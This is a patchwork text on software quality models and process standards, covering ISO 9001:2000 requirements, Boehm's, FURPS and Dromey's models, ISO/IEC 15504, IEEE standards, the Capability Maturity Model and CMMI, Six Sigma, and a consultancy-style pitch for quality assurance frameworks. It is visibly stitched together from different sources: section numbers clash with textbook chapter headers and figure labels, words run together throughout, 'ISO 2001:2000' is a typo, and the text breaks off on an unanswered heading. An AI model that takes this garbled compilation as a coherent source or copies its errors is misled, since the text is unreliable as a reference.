• Principle 8. Mutually Beneficial Supplier Relationships: Organizationsrarely make all the components they use in their products. It is a commonpractice for organizations to procure components and subsystems from thirdparties. An organization must carefully choose the suppliers and make themaware of the organization’s needs and expectations. The performance ofthe products procured from outside should be evaluated, and the need toimprove their products and processes should be communicated to the sup-pliers. A mutually beneficial, cooperative relationship should be maintainedwith the suppliers.

3.2 ISO 9001:2000 Requirements

In this section, we will briefly describe five major parts of the ISO 9001:2000. Forfurther details, we refer the reader to reference 8. The five major parts of the ISO9001:2000, found in parts 4–8, are presented next.

Part 4: Systemic Requirements The concept of a quality management system(QMS) is the core of part 4 of the ISO 2001:2000 document. A quality managementsystem is defined in terms of quality policy and quality objectives. In the softwaredevelopment context, an example of a quality policy is to review all work productsby at least two skilled persons. Another quality policy is to execute all the testcases for at least two test cycles during system testing. Similarly, an example of aquality objective is to fix all defects causing a system to crash before release. Mech-anisms are required to be defined in the form of processes to execute the qualitypolicies and achieve the quality objectives. Moreover, mechanisms are required tobe defined to improve the quality management system. Activities to realize qualitypolicies and achieve quality objectives are defined in the form of interacting qualityprocesses . For example, requirement review can be treated as a distinct process.Similarly, system-level testing is another process in the quality system. Interactionbetween the said processes occur because of the need to make all requirementstestable and the need to verify that all requirements have indeed been adequatelytested. Similarly, measurement and analysis are important processes in modern-daysoftware development. Improvements in an existing QMS is achieved by defininga measurement and analysis process and identifying areas for improvements.


Documentation is an important part of a QMS. There is no QMS withoutproper documentation. A QMS must be properly documented by publishing a qual-ity manual. The quality manual describes the quality policies and quality objectives.Procedures for executing the QMS are also documented. As a QMS evolves byincorporating improved policies and objectives, the documents must accordingly becontrolled. A QMS document must facilitate effective and efficient planning, execu-tion, and management of organizational processes. Records generated as a result ofexecuting organizational processes are documented and published to show evidencethat various ISO 9001:2000 requirements have been met. All process details andorganizational process interactions are documented. Clear documentation is key tounderstanding how one process is influenced by another. The documentation partcan be summarized as follows:

• Document the organizational policies and goals. Publish a vision of theorganization.

• Document all quality processes and their interrelationship.

• Implement a mechanism to approve documents before they are distributed.

• Review and approve updated documents.

• Monitor documents coming from suppliers.

• Document the records showing that requirements have been met.

• Document a procedure to control the records.

Part 5: Management Requirements The concept of quality cannot be dealtwith in bits and pieces by individual developers and test engineers. Rather, uppermanagement must accept the fact that quality is an all-pervasive concept. Uppermanagement must make an effort to see that the entire organization is aware of thequality policies and quality goals. This is achieved by defining and publishing aQMS and putting in place a mechanism for its continual improvement. The QMSof the organization must be supported by upper management with the right kindand quantity of resources. The following are some important activities for uppermanagement to perform in this regard:

• Generate an awareness for quality to meet a variety of requirements, suchas customer, regulatory, and statutory.

• Develop a QMS by identifying organizational policies and goals concerningquality, developing mechanisms to realize those policies and goals, andallocating resources for their implementations.

• Develop a mechanism for continual improvement of the QMS.

• Focus on customers by identifying and meeting their requirements in orderto satisfy them.

• Develop a quality policy to meet the customers’ needs, serve the organi-zation itself, and make it evolvable with changes in the marketplace andnew developments in technologies.


• Deal with the quality concept in a planned manner by ensuring that qualityobjectives are set at the organizational level, quality objectives supportquality policy, and quality objectives are measurable.

• Clearly define individual responsibilities and authorities concerning theimplementation of quality policies.

• Appoint a manager with the responsibility and authority to oversee theimplementation of the organizational QMS. Such a position gives clearvisibility of the organizational QMS to the outside world, namely, to thecustomers.

• Communicate the effectiveness of the QMS to the staff so that the staff isin a better position to conceive improvements in the existing QMS model.

• Periodically review the QMS to ensure that it is an effective one and itadequately meets the organizational policy and objectives to satisfy thecustomers. Based on the review results and changes in the marketplaceand technologies, actions need to be taken to improve the model by settingbetter policies and higher goals.

Part 6: Resource Requirements Resources are key to achieving organizationalpolicies and objectives. Statements of policies and objectives must be backed upwith allocation of the right kind and quantity of resources. There are different kindsof resources, namely, staff, equipment, tool, financial, and building, to name themajor ones. Typically, different resources are controlled by different divisions of anorganization. In general, resources are allocated to projects on a need basis. Sinceevery activity in an organization needs some kind of resources, the resource man-agement processes interact with other kinds of processes. The important activitiesconcerning resource management are as follows:

• Identify and provide resources required to support the organizational qual-ity policy in order to realize the quality objectives. Here the key factoris to identify resources to be able to meet—and even exceed–customerexpectations.

• Allocate quality personnel resources to projects. Here, the quality of per-sonnel is defined in terms of education, training, experience, and skills.

• Put in place a mechanism to enhance the quality level of personnel. Thiscan be achieved by defining an acceptable, lower level of competence.For personnel to be able to move up to the minimum acceptable level ofcompetence, it is important to identify and support an effective trainingprogram. The effectiveness of the training program must be evaluated ona continual basis.

• Provide and maintain the means, such as office space, computing needs,equipment needs, and support services, for successful realization of theorganizational QMS.

• Manage a work environment, including physical, social, psychological, andenvironmental factors, that is conducive to producing efficiency and effec-tiveness in “people” resources.


Part 7: Realization Requirements This part deals with processes that trans-form customer requirements into products. The reader may note that not much haschanged from ISO 9001:1994 to ISO 9001:2000 in the realization part. The keyelements of the realization part are as follows:

• Develop a plan to realize a product from its requirements. The importantelements of such a plan are identification of the processes needed to developa product, sequencing the processes, and controlling the processes. Productquality objectives and methods to control quality during development areidentified during planning.

• To realize a product for a customer, much interaction with the customer isnecessary to understand and capture the requirements. Capturing require-ments for a product involves identifying different categories of require-ments, such as requirements generated by the customers, requirementsnecessitated by the product’s use, requirements imposed by external agen-cies, and requirements deemed to be useful to the organization itself.

• Review the customers’ requirements before committing to the project.Requirements that are not likely to be met should be rejected in this phase.Moreover, develop a process for communicating with the customers. It isimportant to involve the customers in all phases of product development.

• Once requirements are reviewed and accepted, product design and devel-opment take place:

Product design and development start with planning: Identify thestages of design and development, assign various responsibilitiesand authorities, manage interactions between different groups, andupdate the plan as changes occur.

Specify and review the inputs for product design and development.

Create and approve the outputs of product design and development. Usethe outputs to control product quality.

Periodically review the outputs of design and development to ensurethat progress is being made.

Perform design and development verifications on their outputs.

Perform design and development validations.

Manage the changes effected to design and development: Identify thechanges, record the changes, review the changes, verify the changes,validate the changes, and approve the changes.

• Follow a defined purchasing process by evaluating potential suppliers basedon a number of factors, such as ability to meet requirements and price, andverify that a purchased product meets its requirements.

• Put in place a mechanism and infrastructure for controlling production.This includes procedures for validating production processes, proceduresfor identifying and tracking both concrete and abstract items, procedures


for protecting properties supplied by outside parties, and procedures forpreserving organizational components and products.

• Identify the monitoring and measuring needs and select appropriate devicesto perform those tasks. It is important to calibrate and maintain thosedevices. Finally, use those devices to gather useful data to know that theproducts meet the requirements.

Part 8: Remedial Requirements This part is concerned with measurement,analysis of measured data, and continual improvement. Measurement of perfor-mance indicators of processes allows one to determine how well a process isperforming. If it is observed that a process is performing below the desired level,then corrective action can be taken to improve the performance of the process. Con-sider the following example. We find out the sources of defects during system-leveltesting and count, for example, those introduced in the design phase. If too manydefects are found to be introduced in the design phase, actions are required to betaken to reduce the defect count. For instance, an alternative design review tech-nique can be introduced to catch the defects in the design phase. In the absenceof measurement it is difficult to make an objective decision concerning processimprovement. Thus, measurement is an important activity in an engineering dis-cipline. Part 8 of the ISO 9001:2000 addresses a wide range of performancemeasurement needs as explained in the following:

• The success of an organization is largely determined by the satisfaction ofits customers. Thus, the standard requires organizations to develop methodsand procedures for measuring and tracking the customer’s satisfaction levelon an ongoing basis. For example, the number of calls to the help line of anorganization can be considered as a measure of customer satisfaction—toomany calls is a measure of less customer satisfaction.

• An organization needs to plan and perform internal audits on a regularbasis to track the status of the organizational QMS. An example of aninternal audit is to find out whether or not personnel with adequate edu-cation, experience, and skill have been assigned to a project. An internalaudit needs to be conducted by independent auditors using a documentedprocedure. Corrective measures are expected to be taken to address anydeficiency discovered by the auditors.

• The standard requires that both processes, including QMS processes, andproducts be monitored using a set of key performance indicators. Anexample of measuring product characteristics is to verify whether or not aproduct meets its requirements. Similarly, an example of measuring pro-cess characteristics is to determine the level of modularity of a softwaresystem.

• As a result of measuring product characteristics, it may be discovered thata product does not meet its requirements. Organizations need to ensure thatsuch products are not released to the customers. The causes of the differ-ences between an expected product and the real one need to be identified.


• The standard requires that the data collected in the measurement processesare analyzed for making objective decisions. Data analysis is performedto determine the effectiveness of the QMS, impact of changes made tothe QMS, level of customer satisfaction, conformance of products to theirrequirements, and performance of products and suppliers.

• We expect that products have defects, since manufacturing processes maynot be perfect. However, once it is known that there are defects in prod-ucts caused by deficiencies in the processes used, efforts must be madeto improve the processes. Process improvement includes both correctiveactions and preventive actions to improve the quality of products.

4 Boehm’s Quality Model (1978) The second of the basic and founding predecessors of today’s quality models is the quality model presented by

Barry W. Boehm [12;13]. Boehm addresses the contemporary shortcomings of models that automatically and quantitatively evaluate the quality of software. In essence his models attempts to qualitatively define software quality by a given set of attributes and metrics. Boehm's model is similar to the McCall Quality Model in that it also presents a hierarchical quality model structured around high-level characteristics, intermediate level characteristics, primitive characteristics - each of which contributes to the overall quality level.

The high-level characteristics represent basic high-level requirements of actual use to which evaluation of software quality could be put – the general utility of software. The high-level characteristics address three main questions that a buyer of software has: • As-is utility: How well (easily, reliably, efficiently) can I use it as-is?• Maintainability: How easy is it to understand, modify and retest?• Portability: Can I still use it if I change my environment?The intermediate level characteristic represents Boehm’s 7 quality factors that together represent the qualities expected from a software system: • Portability (General utility characteristics): Code possesses the characteristic portability to the extent that it can

be operated easily and well on computer configurations other than its current one.• Reliability (As-is utility characteristics): Code possesses the characteristic reliability to the extent that it can be

expected to perform its intended functions satisfactorily.• Efficiency (As-is utility characteristics): Code possesses the characteristic efficiency to the extent that it fulfills

its purpose without waste of resources.• Usability (As-is utility characteristics, Human Engineering): Code possesses the characteristic usability to the

extent that it is reliable, efficient and human-engineered.• Testability (Maintainability characteristics): Code possesses the characteristic testability to the extent that it

facilitates the establishment of verification criteria and supports evaluation of its performance.• Understandability (Maintainability characteristics): Code possesses the characteristic understandability to the

extent that its purpose is clear to the inspector.• Flexibility (Maintainability characteristics, Modifiability): Code possesses the characteristic modifiability to the

extent that it facilitates the incorporation of changes, once the nature of the desired change has been determined.(Note the higher level of abstractness of this characteristic as compared with augmentability).

The lowest level structure of the characteristics hierarchy in Boehm’s model is the primitive characteristics metrics hierarchy. The primitive characteristics provide the foundation for defining qualities metrics – which was one of the

goals when Boehm constructed his quality model. Consequently, the model presents one ore more metrics2 supposedly measuring a given primitive characteristic.

Portability

Human Engineering

Testability

Understandability

Efficiency

Self Containedness

DeviceIndependence

Accuracy

Completeness

Consistency

Robustness/Integrity

Accountability

Device Efficiency

Acessibility

Communicativiness

Self Descriptiveness

Reliability

Structuredness

Conciseness

Legibility

Augmentability

Modifiability

Maintainability

General Utility

As-is Utility

Figure 4: Boehm's Software Quality Characteristics Tree [13]. As-is Utility, Maintainability, and Portability are necessary (but not sufficient) conditions for General Utility. As-is Utility requires a program to be Reliable and adequately Efficient and Human-Engineered. Maintainability requires that the user be able to understand, modify, and test the program, and is aided by good Human-engineering

Though Boehm’s and McCall’s models might appear very similar, the difference is that McCall’s model primarily focuses on the precise measurement of the high-level characteristics “As-is utility” (see Figure 4 above), whereas Boehm’s quality mode model is based on a wider range of characteristics with an extended and detailed focus on primarily maintainability. Figure 5 compares the two quality models, quality factor by quality factor.

Criteria/goals McCall, 1977

Boehm, 1978

Correctness * *Reliability * *Integrity * *Usability * *Effiency * *Maintainability * *Testability *Interoperability *Flexibility * *Reusability * *Portability * *Clarity *Modifiability *Documentation *Resilience *Understandability *Validity *FunctionalityGenerality *Economy *

2 Defined by Boehm as: ”a measure of extent or degree to which a product possesses and exhibits a certain (quality) characteristic”.

Figure 5: Comparison between criteria/goals of the McCall and Boehm quality models [14].

As indicated in Figure 5 above Boehm focuses a lot on the models effort on software maintenance cost-effectiveness – which, he states, is the primary payoff of an increased capability with software quality considerations.

5 . FURPS/FURPS+ A later, and perhaps somewhat less renown, model that is structured in basically the same manner as the

previous two quality models (but still worth at least to be mentioned in this context) is the FURPS model originally presented by Robert Grady [15] (and extended by Rational Software [16-18] - now IBM Rational Software - into FURPS+3). FURPS stands for: • Functionality – which may include feature sets, capabilities and security• Usability - which may include human factors, aesthetics, consistency in the user interface, online and context-

sensitive help, wizards and agents, user documentation, and training materials• Reliability - which may include frequency and severity of failure, recoverability, predictability, accuracy, and

mean time between failure (MTBF)• Performance - imposes conditions on functional requirements such as speed, efficiency, availability, accuracy,

throughput, response time, recovery time, and resource usage• Supportability - which may include testability, extensibility, adaptability, maintainability, compatibility,

configurability, serviceability, installability, localizability (internationalization)The FURPS-categories are of two different types: Functional (F) and Non-functional (URPS). These categories can be used as both product requirements as well as in the assessment of product quality.

6 . Dromey's Quality Model An even more recent model similar to the McCall’s, Boehm’s and the FURPS(+) quality model, is the quality

model presented by R. Geoff Dromey [19;20]. Dromey proposes a product based quality model that recognizes that quality evaluation differs for each product and that a more dynamic idea for modeling the process is needed to be wide enough to apply for different systems. Dromey is focusing on the relationship between the quality attributes and the sub-attributes, as well as attempting to connect software product properties with software quality attributes.

Implementation

Correctness Internal Contextual Descriptive

Functionality, reliability Maintainability, efficiency, reliability

Maintainability, reusability, portability,reliability

Maintainability, reusability, portability,usability

Implementation

Correctness Internal Contextual Descriptive

Functionality, reliability Maintainability, efficiency, reliability

Maintainability, reusability, portability,reliability

Maintainability, reusability, portability,usability

Software product

Product properties

Quality attributes

Figure 6: Principles of Dromey’s Quality Model

As Figure 6 illustrates, there are three principal elements to Dromey's generic quality model

3 The "+" in FURPS+ includes such requirements as design constraints, implementation requirements, interface requirements and physical requirements.

1) Product properties that influence quality2) High level quality attributes3) Means of linking the product properties with the quality attributes.

Dromey's Quality Model is further structured around a 5 step process: 1) Chose a set of high-level quality attributes necessary for the evaluation.2) List components/modules in your system.3) Identify quality-carrying properties for the components/modules (qualities of the component that have the most

impact on the product properties from the list above).4) Determine how each property effects the quality attributes.5) Evaluate the model and identify weaknesses.

7. ISO/IEC 15504 (SPICE6) The ISO/IEC 15504: Information Technology - Software Process Assessment is a large international standard

framework for process assessment that intends to address all processes involved in: • Software acquisition• Development• Operation• Supply• Maintenance• Support

ISO/IEC 15504 consists of 9 component parts covering concepts, process reference model and improvement guide, assessment model and guides, qualifications of assessors, and guide for determining supplier process capability: 1) ISO/IEC 15504-1 Part 1: Concepts and Introductory Guide.2) ISO/IEC 15504-2 Part 2: A Reference Model for Processes and Process Capability.3) ISO/IEC 15504-3 Part 3: Performing an Assessment.4) ISO/IEC 15504-4 Part 4: Guide to Performing Assessments.5) ISO/IEC 15504-5 Part 5: An Assessment Model and Indicator Guidance.6) ISO/IEC 15504-6 Part 6: Guide to Competency of Assessors.7) ISO/IEC 15504-7 Part 7: Guide for Use in Process Improvement.8) ISO/IEC 15504-8 Part 8: Guide for Use in Determining Supplier Process Capability.9) ISO/IEC 15504-9 Part 9: Vocabulary.

Given the structure and contents of the ISO/IEC 15504 documentation it is more closely related to ISO 9000, ISO/IEC 12207 and CMM, rather than the initially discussed quality models (McCall, Boehm and ISO 9126).

8. IEEE IEEE has also release several standards, more or less related to the topic covered within this technical paper. To

name a few: • IEEE Std. 1220-1998: IEEE Standard for Application and Management of the Systems Engineering Process• IEEE Std 730-1998: IEEE Standard for Software Quality Assurance Plans• IEEE Std 828-1998: IEEE Standard for Software Configuration Management Plans – Description• IEEE Std 829-1998: IEEE Standard For Software Test Documentation• IEEE Std 830-1998: IEEE recommended practice for software requirements specifications• IEEE Std 1012-1998: IEEE standard for software verification and validation plans• IEEE Std 1016-1998: IEEE recommended practice for software design descriptions• IEEE Std 1028-1997: IEEE Standard for Software Reviews• IEEE Std 1058-1998: IEEE standard for software project management plans• IEEE Std 1061-1998: IEEE standard for a software quality metrics methodology• IEEE Std 1063-2001: IEEE standard for software user documentation• IEEE Std 1074-1997: IEEE standard for developing software life cycle processes• IEEE/EIA 12207.0-1996: Standard Industry Implementation of International Standard ISO/IEC 12207: 1995

(ISO/IEC 12207) Standard for Information Technology Software Life Cycle ProcessesOf the above mentioned standards it is probably the implementation of ISO/IEC 12207: 1995 that most

resembles previously discussed models in that it describes the processes for the following life-cycle: • Primary Processes: Acquisition, Supply, Development, Operation, and Maintenance.• Supporting Processes: Documentation, Configuration Management, Quality Assurance, Verification, Validation,

Joint Review, Audit, and Problem Resolution.• Organization Processes: Management, Infrastructure, Improvement, and Training

In fact, IEEE/EIA 12207.0-1996 is so similar to the ISO 9000 standard that it could actually bee seen as a potential replacement for ISO within software engineering organizations.

The IEEE Std 1061-1998 is another standard that is relevant from the perspective of this technical paper as the standard provides a methodology for establishing quality requirements and identifying, implementing, analyzing and validating the process and product of software quality metrics.

548 CHAPTER 18 MATURITY MODELS

9 CAPABILITY MATURITY MODEL

In software development processes we seek three desirable attributes as follows:

1. The products are of the highest quality. Ideally, a product should be free ofdefects. However, in practice, a small number of defects with less severeconsequences are generally tolerated.

2. Projects are completed according to their plans, including the schedules.

3. Projects are completed within the allocated budgets.

However, developers of large software products rarely achieve the above threeattributes. Due to the complex nature of software systems, products are releasedwith known and unknown defects. The unknown defects manifest themselves asunexpected failures during field operation, that is, when we know that the systemwas released with unknown defects. In many organizations, software projects areoften late and over budget. Due to the business angle in software development,it is important for the survival of organizations to develop low-cost, high-qualityproducts within a short time. In order to move toward that goal, researchers anddevelopers are devising new techniques and tools. However, introduction of newtechniques and tools into a process must be carefully planned to effect improve-ments in products.

While awarding a contract to an organization for a software product, thecustomer needs to gain confidence that the organization is capable of deliveringthe desired product. Such confidence can be gained by evaluating the capabilitiesof the organizations. The U.S. Department of Defense being a large customer ofsoftware systems, it wanted to evaluate the capabilities of its software contractors.The Department of Defense wanted to have a framework to evaluate the maturityof software processes used by organizations. In circa 1986, the SEI at initiated thedevelopment of a framework to evaluate process maturity.

The maturity level of a development process tells us to what extent theorganization is capable of producing low-cost, high-quality software. Therefore,the evaluation framework is the CMM. After evaluating the current maturity levelof a development process, organizations can work on improving the process toachieve the next higher level of process maturity. In the CMM framework, a processhas five maturity levels. Before going into the details of different maturity levels,it is useful to have a glimpse of an immature process—an organization can beconsidered to be immature if it follows immature processes [2].

On the one hand, an immature organization may not have a defined process,and, even if there is one, the organization may not follow it. Developers andmanagers react to problems when they occur, rather than take preventive measuresto eliminate them or reduce the frequency of their occurrences. In other words,product and process problems are resolved in an ad hoc manner. Estimates of cost,schedule, and quality are highly inaccurate due to the absence of a measurementprogram to gather process data. Hence, projects overrun cost and time estimatesby a large factor. There is no measurement program to evaluate product or processquality.

18.2 CAPABILITY MATURITY MODEL 549

On the other hand, a mature organization carries out its activities in a plannedmanner. Both process and product characteristics are measured to keep track ofprogress and quality of products. Estimates are more accurate due to following arigorous measurement program. Employees are kept abreast of new developmentsthrough training. Continual effort is made to improve the quality of products whilebringing down costs and lead times. Defined processes are continually updatedto take advantage of new techniques, tools, and experience from past projects.As an organization becomes more and more mature, standards and organizationalpolicies play key roles in product development. Organizations become mature in anincremental manner; that is, processes are improved in an evolutionary approach,rather than effecting drastic changes.

As an organization moves from one level to the next, its process capabilityimproves to produce better quality software at a lower cost. The CMM definesfive distinct levels of maturity, where level 1 is the initial level and level 5 is thehighest level of process maturity.

9.1 CMM ArchitectureFirst we explain the concept of a maturity level using Figure 18.1 followed by a detailed description of individual levels. Figure 18.1 can be read as follows:

• A maturity level indicates process capability and contains key process areas(KPAs). The KPAs for each level are listed in Figure 18.2.

Describe

Key process areas

Common features

Key practices

Process capability

Goals

Implementation orinstitutionalization

Infrastructure oractivities

Maturity levels

ContainIndicate

Achieve Organized by

ContainAddress

Figure 18.1 CMM structure. (From ref. 3. © 2005 John Wiley & Sons.)


Peer review

Requirements managementSoftware project planningSoftware project tracking and oversightSoftware subcontract managementSoftware quality assuranceSoftware configuration management

Quantitative process managementSoftware quality management

Defect preventionTechnology change managementProcess change management

Initial Level 1

Level 3: Defined

Level 4: Managed

Level 5: Optimizing

Disciplined process

Standard consistent process

Predictable process

Continuously improvingprocess

Level 2: Repeatable

Organization process focusOrganization process definitionTraining programIntegrated software managementSoftware product engineeringIntergroup coordination

Figure 18.2 SW-CMM maturity levels. (From ref. 3. © 2005 John Wiley & Sons.)

• Key process areas are expected to achieve goals and are organized bycommon features.

• Common features contain key practices and address implementation orinstitutionalization of the key practices.

• Key practices describe infrastructure or activities.

• When the key practices are followed, the goals of the KPAs are expectedto be achieved.

• A maturity level is reached by meeting all the goals of all the KPAs at thatlevel.

9.2 Five Levels of Maturity and Key Process AreasThe five levels of process maturity and their KPAs are explained as follows. The KPAs for each maturity level are listed in Figure 18.2.

Level 1: Initial At this level, software is developed by following no processmodel. There is not much planning involved. Even if a plan is prepared, it may notbe followed. Individuals make decisions based on their own capabilities and skills.There is no KPA associated with level 1. An organization reaches level 1 withoutmaking any effort.


Level 2: Repeatable At this level, the concept of a process exists so that successcan be repeated for similar projects. Performance of the proven activities of pastprojects is used to prepare plans for future projects. This level can be summarizedas being disciplined because processes are used for repeatability. All the processesare under the effective control of a project management system. The KPAs at level 2are as follows:

• Requirements Management: It is important to establish a common under-standing between the customer and developers. Details of a project, suchas planning and management, are guided by a common view of customerrequirements.

• Software Project Planning: This means creating and following a reason-able plan for realizing and managing a project.

• Software Project Tracking and Oversight: This means making theprogress of a project visible so that management is aware of the statusof the project. Corrective actions can be taken if the actual progress of aproject significantly deviates from the planned progress.

• Software Subcontract Management: This means evaluating, selecting,and managing suppliers or subcontractors.

• Software Quality Assurance: This means evaluating processes and prod-ucts to understand their effectiveness and quality.

• Software Configuration Management: This means ensuring the integrityof the products of a project as long as the project continues to exist.

Level 3: Defined At this level, documentation plays a key role. Processes thatare related to project management and software development activities are docu-mented, reviewed, standardized, and integrated with organizational processes. Inother words, there is organizationwide acceptance of standard processes. Softwaredevelopment is carried out by following an approved process. Functionalities andthe associated qualities are tracked. Cost and schedule are monitored to keep themunder control. The KPAs at level 3 are as follows:

• Organization Process Focus: This means putting in place an organiza-tionwide role and responsibility to ensure that activities concerning processimprovement are in fact followed.

• Organization Process Definition: Certain practices are useful irrespectiveof projects. Thus, it is important to identify and document those practices.

• Training Program: Individuals need to be trained on an on-going basis tomake them knowledgeable in application domains and new developments insoftware techniques and tools. Training is expected to make them effectiveand efficient.

• Integrated Software Management: This means integrating an organiza-tion’s software engineering and management activities into a common,defined process. Integration is based on commercial and technologicalneeds of individual projects.


• Software Product Engineering: This means following a defined processin a consistent manner by integrating the technical activities to produce soft-ware with desired attributes. The activities include requirements elicitation,functional design, detailed design, coding, and testing.

• Intergroup Coordination: This means that a software development groupcoordinates with other groups, such as customers, the marketing group, theand software quality assurance (SQA) group, to understand their needs andexpectations.

• Peer Review: Work products, such as requirements, design, and code, arereviewed by peers to find defects at an early stage. Peer reviews can beperformed by means of inspection and walkthrough.

Level 4: Managed At this level, metrics play a key role. Metrics concerningprocesses and products are collected and analyzed. Those metrics are used to gainquantitative insight into both process and product qualities. When the metrics showthat limits are being exceeded, corrective actions are triggered. For example, if toomany test cases fail during system testing, it is useful to start a process of rootcause analysis to understand why so many tests are failing. The KPAs at level 4are as follows:

• Quantitative Process Management: Process data indicate how well a pro-cess is performing. If a process does not perform as expected, the processis improved by considering the measured data.

• Software Quality Management: The quality attributes of products aremeasured in quantitative form to have a better insight into the processesand products. Improvements are incorporated into the processes, and theireffectiveness is evaluated by measuring product quality attributes.

Level 5: Optimizing At this level, organizations strive to improve their pro-cesses on a continual basis. This is achieved in two steps: (i) Observe the effectsof processes, by measuring a few key metrics, on the quality, cost, and leadtime of software products and (ii) effect changes to the processes by introduc-ing new techniques, methods, tools, and strategies. The following are the KPAs atlevel 5:

• Defect Prevention: This means analyzing the root causes of differentclasses of defects and taking preventive measures to ensure that similardefects do not recur.

• Technology Change Management: This means identifying useful tech-niques, tools, and methodologies and gradually introducing those into soft-ware processes. The key idea is to take advantage of new developments intechnologies.

• Process Change Management: This means improving an organization’sprocesses to have a positive impact on quality, productivity, and develop-ment time.


9.3 Common Features of Key Practices

The key practices in every KPA are organized into five categories called commonfeatures as explained in the following. Common features are attributes of keypractices that indicate whether the implementation or institutionalization of a KPAis effective, repeatable, and lasting.

• Commitment to Perform: An organization must show in action—notmerely in words—that it is committed to process improvement. Uppermanagement actions, such as establishing organizational policies and allo-cating resources to process improvement activities, give evidence that anorganization is committed to perform in a better way. For example, man-agement can formulate a policy to use established and enduring processes.

• Ability to Perform: The ability of an organization to realize a process in acompetent manner is determined by the organization’s structure, resources,and people to execute the process. Availability of adequately trained per-sonnel and their attitude to change have a positive impact on their abilityto perform.

• Activities Performed: These describe what needs to be implemented toestablish the capability of a process. They include the roles and proceduresrequired to realize KPAs. Typical activities performed to realize KPAs aremaking plans, executing the plans, tracking the work, and taking correctiveactions to ensure that work stays close to the plan.

• Measurement and Analysis: Measurement is key to knowing the currentstatus and effectiveness of a process. Measurement involves gathering datathat can reveal the progress and effectiveness of processes. The gathereddata must be analyzed to have an insight into the processes. Measurementand analysis must be performed to be able to take corrective actions.

• Verifying Implementation: After having policies and processes in place,it is necessary that activities be performed by complying with the stan-dard process. Compliance with the standard process can be checked byperforming frequent audits and reviews.

9.4 Application of CMM

For an organization to be at a certain level of maturity, all the goals of all the KPAsat that level—and all preceding levels too—must be satisfied. For example, for anorganization to be at level 2, all six KPAs associated with level 2 must be satisfied.For an organization to be at level 3, the organization must meet all six KPAs asso-ciated with level 2 and all seven KPAs associated with level 3. The SEI providestwo methodologies to evaluate the current capabilities of organizations: internalassessments and external evaluations . The SEI developed the capability maturitymodel–based assessment internal process improvement (CBA-IPI) to assist orga-nizations for self-assessment. The CBA-IPI uses the CMM as a reference modelto evaluate the process capability of organizations by identifying what KPAs arebeing satisfied and what need to be improved.


The SEI developed the CMM appraisal framework (CAF) to provide a mech-anism for formal evaluation of organizations. The CAF describes the requirementsand guidelines to be used by external assessors in designing CAF-compliant eval-uation methods.

9.5 Capability Maturity Model Integration (CMMI)

After the development and successful application of the CMM in the softwarearea, which is known as software CMM (CMM-SW), CMMs in other areas weredeveloped as well.

The CMM for software, known as CMM-SW, was first released in 1991as CMM-SW version 1.0, followed by CMM-SW version 1.1 in 1993. After itsfirst release, many software organizations used it for self and external evaluations.The success of CMM-SW led to the development of CMM in other areas. Thus,the concept of CMM is not software specific. In order to appreciate the wideapplicability of CMM, we remind the reader of the following: A CMM is a referencemodel of mature practices in a specific discipline used to apprise and improve agroup’s capability to perform that discipline. To name a few, there are severalCMMs as follows:

• Software CMM

• Systems engineering CMM

• Integrated product development CMM

• Electronic industry alliance 731 CMM

• Software acquisition CMM

• People CMM

• Supplier source CMM

It is apparent from the above examples of the CMM that they are likely tohave different characteristics. The CMMs differ in three ways, namely, discipline,structure, and definition of maturity . First, different CMMs are applied to differentdisciplines, such as software development, system engineering, software acquisi-tion, and people. Second, improvements can be made continuously or in distinctstages. Finally, the definition of maturity is dependent upon the entity under con-sideration. It is obvious that people and software acquisition mature in differentways, and their maturity is defined in different ways.

As more than one CMM was applied in an organization, a number of problemssurfaced because of the following reasons:

• Different models have different structures, different ways of measuringmaturity, and different terms.

• It was difficult to integrate the different CMMs to achieve the commonorganizational goal which is to produce low-cost, high-quality productswithin schedule.

• It was difficult to use many models in supplier selection and subcontracting.

18.3 TEST PROCESS IMPROVEMENT 555

Therefore, a pressing need was felt to have a unified view of process improvementthroughout an organization. Thus, evolved the idea of CMMI. The CMMI includesinformation from the following models:

• Capability maturity model for software (CMM-SW)

• Integrated product development capability maturity model (IPD-CMM)

• Capability maturity model for systems engineering (CMM-SE)

• Capability maturity model for supplier sourcing (CMM-SS)

The usefulness of the CMMI is readily recognized by considering the followingfacts. First, today’s complex software systems are often built by using some subsys-tems developed by other parties. For example, a security module may be purchasedfrom another vendor. Similarly, a communication module may be obtained from avendor specializing in communication systems. There is a need for evaluating thematurity of the suppliers. Second, large systems often contain a number of diversecomponents, such as databases, communications, security, and real-time process-ing. Coexistence and interoperability of the diverse systems, which might havebeen developed by different vendors, are paramount to the successful operation oflarger systems. Consequently, it is important to evaluate the maturity level of anintegrated product development process. Third, in general, complex software sys-tems often need to run on specialized execution platforms. For example, Internetrouting software runs on specialized hardware and a specialized operating system,rather than the commonly used hardware platforms and operating systems. Thosekinds of software need to be developed in the right system context.

•

10 . Six Sigma Model

Given that we are trying to provide a somewhat all covering picture of the more known quality models andphilosophies we also need to at least mention Six Sigma. Six Sigma can be viewed as a management philosophy thatuses customer-focused measurement and goal-setting to create bottom-line results. It strongly advocates listening tothe voice of the customer and converting customer needs into measurable requirements.

Quality frameworks a Quality Assurance Framework must be defined and implemented across all areas business critical programmes, to help drive consistency and successful business outcomes.

Quality assurance (QA) frameworks allow community & voluntary organizations to look at their strengths and weaknesses and continuously improve their quality of service. Obviously, funders and other stakeholders welcome this.

Typically, this would be in support of a client’s programme goals, which might be:

• Building confidence in the integrity of the Quality Assurance approach across the BUs delivering in to the programme

• Delivering objective, realistic and accurate reporting of progress and coverage, to a consistent standard, across the programme and expressed in Business terms

• Managing delivery risks effectively, providing appropriate, relevant and objective information to management to support appropriate decision taking

• Assuring delivery across the programme, meaning that the right things are being done for the right reasons in the right way

• Creating robust and reliable evidence of progress, outcomes and decisions (to support audit and regulatory purposes)

• Providing objective, accurate information to support critical decision points.

Once implemented and fully operational, a Quality Assurance Framework will give you the following benefits:

• Deliver an objective view of the residual risk at any given point of the delivery for the programme team, both project and product risk

• Report on the quality of the deliverables in absolute and “Earned Value” terms, allowing the key stakeholders to understand the residual risk contained within the programme at any given point

• Identify risks and issues inherent to the programme delivery and ensures that these are visible until managed or mitigated

• Provide metrics and evidence to support compliance to regulatory standards • Provide direct support to the key decision points in the programme by providing

objective and timely information to key stakeholders and the Steering Committee in terms that are meaningful to them, and frame the Business consequences of the findings (especially defects residual in the system or missing scope) via the Assurance disciplines outlined below.

• Primarily assure that the programme deliverables are the “right things, built the right way”

• Help to drive through strategic transformation in change programmes

There are a number of common scenarios, such as differences in approach and maturity levels across an organization, which stop programmes from optimizing their capabilities and which increase both product and business risk - ultimately leading to increased cost as more errors need to be fixed late in the day.

Why use a Quality Assurance Framework?

